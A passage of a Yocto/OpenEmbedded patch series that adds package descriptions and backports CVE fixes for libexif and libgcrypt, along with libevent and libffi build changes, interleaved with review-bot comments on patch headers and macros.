+DESCRIPTION = "Lightweight daemon framework for OpenBSD. It provides \
+facilities for logging and a signal handler to enable graceful shutdown, \
+as well as file locking to ensure that only a single copy of a given daemon \
+is running at a time."
SECTION = "libs"
AUTHOR = "Lennart Poettering <lennart@poettering.net>"
HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/"
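Review bot: The added DESCRIPTION calls this a "daemon framework for OpenBSD", which contradicts the SUMMARY on the line above it ("eases the writing of UNIX daemons"); the text looks as if it was taken from a different project with the same name. Package metadata ends up in feeds and manifests, so it should describe the software actually built. A first sentence derived from the SUMMARY, e.g. `DESCRIPTION = "Lightweight C library that eases the writing of UNIX daemons."`, would be accurate, with the feature list kept only once it is checked against the upstream README.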
diff --git a/meta/recipes-support/libevdev/libevdev/determinism.patch b/meta/recipes-support/libevdev/libevdev/determinism.patch
index 33a6076b78..06128a8e7e 100644
--- a/meta/recipes-support/libevdev/libevdev/determinism.patch
+++ b/meta/recipes-support/libevdev/libevdev/determinism.patch
@@ -4,7 +4,8 @@ Sort to remove this inconsistency.
RP 2020/2/7
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Pending
+Submitted: https://lists.freedesktop.org/archives/input-tools/2021-February/001560.html
+Upstream-Status: Backport [https://gitlab.freedesktop.org/libevdev/libevdev/-/commit/8d70f449892c6f7659e07bb0f06b8347677bb7d8]
Index: a/libevdev/make-event-names.py
===================================================================
diff --git a/meta/recipes-support/libevdev/libevdev_1.8.0.bb b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
index 3523dc0968..fd7dd15c26 100644
--- a/meta/recipes-support/libevdev/libevdev_1.8.0.bb
+++ b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
@@ -1,4 +1,7 @@
SUMMARY = "Wrapper library for evdev devices"
+DESCRIPTION = "A library for handling evdev kernel devices. It abstracts \
+the evdev ioctls through type-safe interfaces and provides functions \
+to change the appearance of the device."
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/"
SECTION = "libs"
diff --git a/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
new file mode 100644
index 0000000000..0b20eda3c0
--- /dev/null
+++ b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
@@ -0,0 +1,33 @@
+From dff8fd27edb23bc1486809186c6a4fe1f75f2179 Mon Sep 17 00:00:00 2001
+From: Yi Fan Yu <yifan.yu@windriver.com>
+Date: Thu, 22 Apr 2021 22:35:59 -0400
+Subject: [PATCH] test/regress.h: Increase default timeval tolerance 50 ms ->
+ 100 ms
+
+The default timeout tolerance is 50 ms,
+which causes intermittent failure in many the
+related tests in arm64 QEMU.
+
+See: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14163
+(The root cause seems to be a heavy load)
+
+Upstream-Status: Submitted [https://github.com/libevent/libevent/pull/1157]
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
+---
+ test/regress.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/test/regress.h b/test/regress.h
+index f06a7669..829af4a7 100644
+--- a/test/regress.h
++++ b/test/regress.h
+@@ -127,7 +127,7 @@ int test_ai_eq_(const struct evutil_addrinfo *ai, const char *sockaddr_port,
+ tt_int_op(labs(timeval_msec_diff((tv1), (tv2)) - diff), <=, tolerance)
+
+ #define test_timeval_diff_eq(tv1, tv2, diff) \
+- test_timeval_diff_leq((tv1), (tv2), (diff), 50)
++ test_timeval_diff_leq((tv1), (tv2), (diff), 100)
+
+ long timeval_msec_diff(const struct timeval *start, const struct timeval *end);
+
diff --git a/meta/recipes-support/libevent/libevent_2.1.11.bb b/meta/recipes-support/libevent/libevent_2.1.11.bb
index fb186eb89f..75f9979c5b 100644
--- a/meta/recipes-support/libevent/libevent_2.1.11.bb
+++ b/meta/recipes-support/libevent/libevent_2.1.11.bb
@@ -1,4 +1,9 @@
SUMMARY = "An asynchronous event notification library"
+DESCRIPTION = "A software library that provides asynchronous event \
+notification. The libevent API provides a mechanism to execute a callback \
+function when a specific event occurs on a file descriptor or after a \
+timeout has been reached. libevent also supports callbacks triggered \
+by signals and regular timeouts"
HOMEPAGE = "http://libevent.org/"
BUGTRACKER = "https://github.com/libevent/libevent/issues"
SECTION = "libs"
@@ -10,6 +15,7 @@ SRC_URI = "https://github.com/libevent/libevent/releases/download/release-${PV}-
file://Makefile-missing-test-dir.patch \
file://run-ptest \
file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \
+ file://0002-test-regress.h-Increase-default-timeval-tolerance-50.patch \
"
SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531"
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0198.patch b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
new file mode 100644
index 0000000000..2a48844cb2
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
@@ -0,0 +1,66 @@
+From ca71eda33fe8421f98fbe20eb4392473357c1c43 Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:22:47 +0800
+Subject: [PATCH] fixed another unsigned integer overflow
+
+first fixed by google in android fork,
+https://android.googlesource.com/platform/external/libexif/+/1e187b62682ffab5003c702657d6d725b4278f16%5E%21/#F0
+
+(use a more generic overflow check method, also check second overflow instance.)
+
+https://security-tracker.debian.org/tracker/CVE-2020-0198
+
+Upstream-Status: Backport[https://github.com/libexif/libexif/commit/ce03ad7ef4e8aeefce79192bf5b6f69fae396f0c]
+CVE: CVE-2020-0198
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-data.c | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/libexif/exif-data.c b/libexif/exif-data.c
+index 8b280d3..34d58fc 100644
+--- a/libexif/exif-data.c
++++ b/libexif/exif-data.c
+@@ -47,6 +47,8 @@
+ #undef JPEG_MARKER_APP1
+ #define JPEG_MARKER_APP1 0xe1
+
++#define CHECKOVERFLOW(offset,datasize,structsize) (( offset >= datasize) || (structsize > datasize) || (offset > datasize - structsize ))
++
+ static const unsigned char ExifHeader[] = {0x45, 0x78, 0x69, 0x66, 0x00, 0x00};
+
+ struct _ExifDataPrivate
+@@ -327,7 +329,7 @@ exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail offset (%u).", o);
+ return;
+ }
+- if (s > ds - o) {
++ if (CHECKOVERFLOW(o,ds,s)) {
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail size (%u), max would be %u.", s, ds-o);
+ return;
+ }
+@@ -420,9 +422,9 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ }
+
+ /* Read the number of entries */
+- if ((offset + 2 < offset) || (offset + 2 < 2) || (offset + 2 > ds)) {
++ if (CHECKOVERFLOW(offset, ds, 2)) {
+ exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
+- "Tag data past end of buffer (%u > %u)", offset+2, ds);
++ "Tag data past end of buffer (%u+2 > %u)", offset, ds);
+ return;
+ }
+ n = exif_get_short (d + offset, data->priv->order);
+@@ -431,7 +433,7 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ offset += 2;
+
+ /* Check if we have enough data. */
+- if (offset + 12 * n > ds) {
++ if (CHECKOVERFLOW(offset, ds, 12*n)) {
+ n = (ds - offset) / 12;
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
+ "Short data; only loading %hu entries...", n);
+--
+2.17.1
+
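Review bot: The `CHECKOVERFLOW` macro added near the top of exif-data.c expands its parameters without parentheses and evaluates each of them more than once. The call `CHECKOVERFLOW(offset, ds, 12*n)` in exif_data_load_data_content gives the intended result only because `*` binds tighter than `>` and `-`. The subtraction `datasize - structsize` is safe only because the `structsize > datasize` test short-circuits before it. If the backport is allowed to diverge from upstream, parenthesise every use: `((offset) >= (datasize)) || ((structsize) > (datasize)) || ((offset) > (datasize) - (structsize))`. Otherwise add a comment above the macro such as `/* arguments must be simple, side-effect-free unsigned expressions; test order matters */`.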
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0452.patch b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
new file mode 100644
index 0000000000..a117b8b369
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
@@ -0,0 +1,39 @@
+From 302acd49eba0a125b0f20692df6abc6f7f7ca53e Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:18:51 +0800
+Subject: [PATCH] fixed a incorrect overflow check that could be optimized
+ away.
+
+inspired by:
+https://android.googlesource.com/platform/external/libexif/+/8e7345f3bc0bad06ac369d6cbc1124c8ceaf7d4b
+
+https://source.android.com/security/bulletin/2020-11-01
+
+CVE-2020-0452
+
+Upsteam-Status: Backport[https://github.com/libexif/libexif/commit/9266d14b5ca4e29b970fa03272318e5f99386e06]
+CVE: CVE-2020-0452
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-entry.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libexif/exif-entry.c b/libexif/exif-entry.c
+index 5de215f..3a6ce84 100644
+--- a/libexif/exif-entry.c
++++ b/libexif/exif-entry.c
+@@ -1371,8 +1371,8 @@ exif_entry_get_value (ExifEntry *e, char *val, unsigned int maxlen)
+ {
+ unsigned char *utf16;
+
+- /* Sanity check the size to prevent overflow */
+- if (e->size+sizeof(uint16_t)+1 < e->size) break;
++ /* Sanity check the size to prevent overflow. Note EXIF files are 64kb at most. */
++ if (e->size >= 65536 - sizeof(uint16_t)*2) break;
+
+ /* The tag may not be U+0000-terminated , so make a local
+ U+0000-terminated copy before converting it */
+--
+2.17.1
+
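Review bot: The status tag in this patch header is misspelled as `Upsteam-Status:`, so tooling or a reviewer searching for the `Upstream-Status:` line will most likely not find it. It should read `Upstream-Status: Backport [https://github.com/libexif/libexif/commit/9266d14b5ca4e29b970fa03272318e5f99386e06]`. CVE-2020-0198.patch, added by the same commit, also omits the space between `Backport` and the opening bracket and could be normalised the same way.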
diff --git a/meta/recipes-support/libexif/libexif_0.6.22.bb b/meta/recipes-support/libexif/libexif_0.6.22.bb
index a520d5c9f9..86d4464253 100644
--- a/meta/recipes-support/libexif/libexif_0.6.22.bb
+++ b/meta/recipes-support/libexif/libexif_0.6.22.bb
@@ -1,4 +1,7 @@
SUMMARY = "Library for reading extended image information (EXIF) from JPEG files"
+DESCRIPTION = "libexif is a library for parsing, editing, and saving EXIF data. It is \
+intended to replace lots of redundant implementations in command-line \
+utilities and programs with GUIs."
HOMEPAGE = "https://libexif.github.io/"
SECTION = "libs"
LICENSE = "LGPLv2.1"
@@ -8,6 +11,8 @@ def version_underscore(v):
return "_".join(v.split("."))
SRC_URI = "https://github.com/libexif/libexif/releases/download/libexif-${@version_underscore("${PV}")}-release/libexif-${PV}.tar.xz \
+ file://CVE-2020-0198.patch \
+ file://CVE-2020-0452.patch \
"
SRC_URI[sha256sum] = "5048f1c8fc509cc636c2f97f4b40c293338b6041a5652082d5ee2cf54b530c56"
diff --git a/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
new file mode 100644
index 0000000000..782dce70d8
--- /dev/null
+++ b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
@@ -0,0 +1,104 @@
+From 501a6b55853af549fae72723e74271f2a4ec7cf6 Mon Sep 17 00:00:00 2001
+From: Brett Warren <brett.warren@arm.com>
+Date: Fri, 27 Nov 2020 15:28:42 +0000
+Subject: [PATCH] arm/sysv: reverted clang VFP mitigation
+
+Since commit e3d2812ce43940aacae5bab2d0e965278cb1e7ea,
+seperate instructions were used when compiling under clang,
+as clang didn't allow the directives at the time. This mitigation
+now causes compilation to fail under clang 10, as described by
+https://github.com/libffi/libffi/issues/607. Now that
+clang supports the LDC and SDC instructions, this mitigation
+has been reverted.
+
+Upstream-Status: Pending
+Signed-off-by: Brett Warren <brett.warren@arm.com>
+---
+ src/arm/sysv.S | 33 ---------------------------------
+ 1 file changed, 33 deletions(-)
+
+diff --git a/src/arm/sysv.S b/src/arm/sysv.S
+index 63180a4..e3ce526 100644
+--- a/src/arm/sysv.S
++++ b/src/arm/sysv.S
+@@ -128,13 +128,8 @@ ARM_FUNC_START(ffi_call_VFP)
+ cfi_startproc
+
+ cmp r3, #3 @ load only d0 if possible
+-#ifdef __clang__
+- vldrle d0, [sp]
+- vldmgt sp, {d0-d7}
+-#else
+ ldcle p11, cr0, [r0] @ vldrle d0, [sp]
+ ldcgt p11, cr0, [r0], {16} @ vldmgt sp, {d0-d7}
+-#endif
+ add r0, r0, #64 @ discard the vfp register args
+ /* FALLTHRU */
+ ARM_FUNC_END(ffi_call_VFP)
+@@ -172,25 +167,13 @@ ARM_FUNC_START(ffi_call_SYSV)
+ nop
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+- vstr s0, [r2]
+-#else
+ stc p10, cr0, [r2] @ vstr s0, [r2]
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+- vstr d0, [r2]
+-#else
+ stc p11, cr0, [r2] @ vstr d0, [r2]
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+- vstm r2, {d0-d3}
+-#else
+ stc p11, cr0, [r2], {8} @ vstm r2, {d0-d3}
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_INT64)
+ str r1, [r2, #4]
+@@ -287,11 +270,7 @@ ARM_FUNC_START(ffi_closure_VFP)
+ add ip, sp, #16
+ sub sp, sp, #64+32 @ allocate frame
+ cfi_adjust_cfa_offset(64+32)
+-#ifdef __clang__
+- vstm sp, {d0-d7}
+-#else
+ stc p11, cr0, [sp], {16} @ vstm sp, {d0-d7}
+-#endif
+ stmdb sp!, {ip,lr}
+
+ /* See above. */
+@@ -320,25 +299,13 @@ ARM_FUNC_START_LOCAL(ffi_closure_ret)
+ cfi_rel_offset(lr, 4)
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+- vldr s0, [r2]
+-#else
+ ldc p10, cr0, [r2] @ vldr s0, [r2]
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+- vldr d0, [r2]
+-#else
+ ldc p11, cr0, [r2] @ vldr d0, [r2]
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+- vldm r2, {d0-d3}
+-#else
+ ldc p11, cr0, [r2], {8} @ vldm r2, {d0-d3}
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_INT64)
+ ldr r1, [r2, #4]
+--
+2.17.1
+
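Review bot: The patch deletes every `#ifdef __clang__` branch in src/arm/sysv.S, leaving the `ldc`/`stc` coprocessor forms as the only encoding, so a clang release that still rejects them would presumably fail to assemble this file. The header says the old mitigation breaks clang 10 but not which oldest clang the new form was checked with; a line such as `Tested with clang <version> and gcc <version>` (placeholders) would record that. The description refers to `LDC and SDC`, while the instructions kept in the file are `ldc` and `stc`. With `Upstream-Status: Pending`, a reference to the upstream submission would also help decide when the patch can be dropped.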
diff --git a/meta/recipes-support/libffi/libffi_3.3.bb b/meta/recipes-support/libffi/libffi_3.3.bb
index 9dfdb9e39b..10ef003242 100644
--- a/meta/recipes-support/libffi/libffi_3.3.bb
+++ b/meta/recipes-support/libffi/libffi_3.3.bb
@@ -13,6 +13,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=492385fe22195952f5b9b197868ba268"
SRC_URI = "https://github.com/libffi/libffi/releases/download/v${PV}/${BPN}-${PV}.tar.gz \
file://not-win32.patch \
file://0001-Fixed-missed-ifndef-for-__mips_soft_float.patch \
+ file://0001-arm-sysv-reverted-clang-VFP-mitigation.patch \
file://0001-powerpc-fix-build-failure-on-power7-and-older-532.patch \
file://0001-Address-platforms-with-no-__int128.patch \
file://0001-Address-platforms-with-no-__int128-part2.patch \
diff --git a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
index 85102a1a3d..8971486715 100644
--- a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for file management"
+DESCRIPTION = "Contains a library and other files required by menu-cache-gen libexec of menu-cache-1.1.0. "
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/libfm/libfm_1.3.1.bb b/meta/recipes-support/libfm/libfm_1.3.1.bb
index 63ae7874b9..b6f9df0c55 100644
--- a/meta/recipes-support/libfm/libfm_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm_1.3.1.bb
@@ -1,4 +1,6 @@
SUMMARY = "Library for file management"
+DESCRIPTION = "LibFM provides file management functions built on top of Glib/GIO \
+giving a convenient higher-level API."
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "GPLv2+ & LGPLv2+"
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
new file mode 100644
index 0000000000..bf26486d8b
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
@@ -0,0 +1,77 @@
+From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Tue, 13 Apr 2021 10:00:00 +0900
+Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding
+ too.
+
+* cipher/elgamal.c (do_encrypt): Also do exponent blinding.
+
+--
+
+Base blinding had been introduced with USE_BLINDING. This patch add
+exponent blinding as well to mitigate side-channel attack on mpi_powm.
+
+GnuPG-bug-id: 5328
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33560
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ cipher/elgamal.c | 20 +++++++++++++++++---
+ 1 file changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..9835122f 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ static void
+ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+ {
+- gcry_mpi_t t1, t2, r;
++ gcry_mpi_t t1, t2, r, r1, h;
+ unsigned int nbits = mpi_get_nbits (skey->p);
++ gcry_mpi_t x_blind;
+
+ mpi_normalize (a);
+ mpi_normalize (b);
+@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+
+ t2 = mpi_snew (nbits);
+ r = mpi_new (nbits);
++ r1 = mpi_new (nbits);
++ h = mpi_new (nbits);
++ x_blind = mpi_snew (nbits);
+
+ /* We need a random number of about the prime size. The random
+ number merely needs to be unpredictable; thus we use level 0. */
+ _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM);
+
++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */
++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM);
++ mpi_set_highbit (r1, nbits - 1);
++ mpi_sub_ui (h, skey->p, 1);
++ mpi_mul (x_blind, h, r1);
++ mpi_add (x_blind, skey->x, x_blind);
++
+ /* t1 = r^x mod p */
+- mpi_powm (t1, r, skey->x, skey->p);
++ mpi_powm (t1, r, x_blind, skey->p);
+ /* t2 = (a * r)^-x mod p */
+ mpi_mulm (t2, a, r, skey->p);
+- mpi_powm (t2, t2, skey->x, skey->p);
++ mpi_powm (t2, t2, x_blind, skey->p);
+ mpi_invm (t2, t2, skey->p);
+ /* t1 = (t1 * t2) mod p*/
+ mpi_mulm (t1, t1, t2, skey->p);
+
++ mpi_free (x_blind);
++ mpi_free (h);
++ mpi_free (r1);
+ mpi_free (r);
+ mpi_free (t2);
+
+--
+2.11.0
+
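Review bot: The changelog line in the patch header names `do_encrypt`, but every changed line is inside `decrypt`; `do_encrypt` appears only as trailing text on the first `@@` line. Anyone auditing which operation received exponent blinding for CVE-2021-33560 would be misled by the header, so a packaging note such as `Note: the blinding is added to decrypt(), not do_encrypt()` is worth adding below the upstream text. `Upstream-Status: Backport` also gives no upstream reference; the hash on the `From` line looks like the upstream commit and could be cited in brackets once confirmed. `decrypt` continues outside the embedded hunks.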
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
new file mode 100644
index 0000000000..b3a18bc5aa
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
@@ -0,0 +1,109 @@
+From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Fri, 21 May 2021 11:15:07 +0900
+Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations.
+
+* cipher/elgamal.c (gen_k): Remove support of smaller K.
+(do_encrypt): Never use smaller K.
+(sign): Folllow the change of gen_k.
+
+--
+
+Cherry-pick master commit of:
+ 632d80ef30e13de6926d503aa697f92b5dbfbc5e
+
+This change basically reverts encryption changes in two commits:
+
+ 74386120dad6b3da62db37f7044267c8ef34689b
+ 78531373a342aeb847950f404343a05e36022065
+
+Use of smaller K for ephemeral key in ElGamal encryption is only good,
+when we can guarantee that recipient's key is generated by our
+implementation (or compatible).
+
+For detail, please see:
+
+ Luca De Feo, Bertram Poettering, Alessandro Sorniotti,
+ "On the (in)security of ElGamal in OpenPGP";
+ in the proceedings of CCS'2021.
+
+CVE-id: CVE-2021-33560
+GnuPG-bug-id: 5328
+Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-40528
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+---
+ cipher/elgamal.c | 24 ++++++------------------
+ 1 file changed, 6 insertions(+), 18 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..ae7a631e 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -66,7 +66,7 @@ static const char *elg_names[] =
+
+
+ static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie);
+-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k);
++static gcry_mpi_t gen_k (gcry_mpi_t p);
+ static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits,
+ gcry_mpi_t **factors);
+ static int check_secret_key (ELG_secret_key *sk);
+@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie )
+
+ /****************
+ * Generate a random secret exponent k from prime p, so that k is
+- * relatively prime to p-1. With SMALL_K set, k will be selected for
+- * better encryption performance - this must never be used signing!
++ * relatively prime to p-1.
+ */
+ static gcry_mpi_t
+-gen_k( gcry_mpi_t p, int small_k )
++gen_k( gcry_mpi_t p )
+ {
+ gcry_mpi_t k = mpi_alloc_secure( 0 );
+ gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) );
+@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k )
+ unsigned int nbits, nbytes;
+ char *rndbuf = NULL;
+
+- if (small_k)
+- {
+- /* Using a k much lesser than p is sufficient for encryption and
+- * it greatly improves the encryption performance. We use
+- * Wiener's table and add a large safety margin. */
+- nbits = wiener_map( orig_nbits ) * 3 / 2;
+- if( nbits >= orig_nbits )
+- BUG();
+- }
+- else
+- nbits = orig_nbits;
+-
++ nbits = orig_nbits;
+
+ nbytes = (nbits+7)/8;
+ if( DBG_CIPHER )
+@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ * error code.
+ */
+
+- k = gen_k( pkey->p, 1 );
++ k = gen_k( pkey->p );
+ mpi_powm (a, pkey->g, k, pkey->p);
+
+ /* b = (y^k * input) mod p
+@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey )
+ *
+ */
+ mpi_sub_ui(p_1, p_1, 1);
+- k = gen_k( skey->p, 0 /* no small K ! */ );
++ k = gen_k( skey->p );
+ mpi_powm( a, skey->g, k, skey->p );
+ mpi_mul(t, skey->x, a );
+ mpi_subm(t, input, t, p_1 );
+--
+2.30.2
+
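Review bot: The header carries two different CVE identifiers: the upstream text says `CVE-id: CVE-2021-33560`, while the packaging trailer says `CVE: CVE-2021-40528`. A short note next to the trailer, for example `Note: upstream's message cites CVE-2021-33560; this change is tracked here as CVE-2021-40528`, would stop a later audit from treating one of them as a mistake. This patch and CVE-2021-33560.patch both show base blob `4eb52d62` for cipher/elgamal.c, so the one applied second presumably relies on line offsets, here in the `sign` hunk; regenerating it on top of the other would make the series apply exactly. `Upstream-Status: Backport` could also name the cherry-picked commit `632d80ef30e13de6926d503aa697f92b5dbfbc5e` that the message already mentions.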
diff --git a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
index 4e0eb0a169..8045bab9ed 100644
--- a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
+++ b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
@@ -1,4 +1,7 @@
SUMMARY = "General purpose cryptographic library based on the code from GnuPG"
+DESCRIPTION = "A cryptography library developed as a separated module of GnuPG. \
+It can also be used independently of GnuPG, but depends on its error-reporting \
+library Libgpg-error."
HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
SECTION = "libs"
@@ -25,10 +28,15 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \
file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \
file://determinism.patch \
+ file://CVE-2021-33560.patch \
+ file://CVE-2021-40528.patch \
"
SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743"
SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3"
+# Below whitelisted CVEs are disputed and not affecting crypto libraries for any distro.
+CVE_CHECK_WHITELIST += "CVE-2018-12433 CVE-2018-12438"
+
BINCONFIG = "${bindir}/libgcrypt-config"
inherit autotools texinfo binconfig-disabled pkgconfig
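Review bot: The comment above `CVE_CHECK_WHITELIST` states that CVE-2018-12433 and CVE-2018-12438 are disputed but gives no source, so a later audit cannot verify why cve-check is told to ignore them. One comment line per entry with the reason and a reference would fix that, for example `# CVE-2018-12433: disputed, see <link to the upstream or NVD statement>` (placeholder link) and the same for CVE-2018-12438. The phrase "not affecting crypto libraries for any distro" is broader than a recipe comment can support; stating the reason this libgcrypt build is unaffected would be safer.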
diff --git a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
index b9a2b01c20..7b7404b516 100644
--- a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
+++ b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
@@ -1,4 +1,5 @@
SUMMARY = "Small library that defines common error values for all GnuPG components"
+DESCRIPTION = "Contains common error codes and error handling functions used by GnuPG, Libgcrypt, GPGME and more packages. "
HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
diff --git a/meta/recipes-support/libical/libical_3.0.7.bb b/meta/recipes-support/libical/libical_3.0.7.bb
index a50473e9ec..170f12b7a9 100644
--- a/meta/recipes-support/libical/libical_3.0.7.bb
+++ b/meta/recipes-support/libical/libical_3.0.7.bb
@@ -1,4 +1,8 @@
SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library"
+DESCRIPTION = "An Open Source implementation of the iCalendar protocols \
+and protocol data units. The iCalendar specification describes how \
+calendar clients can communicate with calendar servers so users can store \
+their calendar data and arrange meetings with other users. "
HOMEPAGE = "https://github.com/libical/libical"
BUGTRACKER = "https://github.com/libical/libical/issues"
LICENSE = "LGPLv2.1 | MPL-2.0"
diff --git a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
index 710ef0172d..841edc6829 100644
--- a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
+++ b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \
file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \
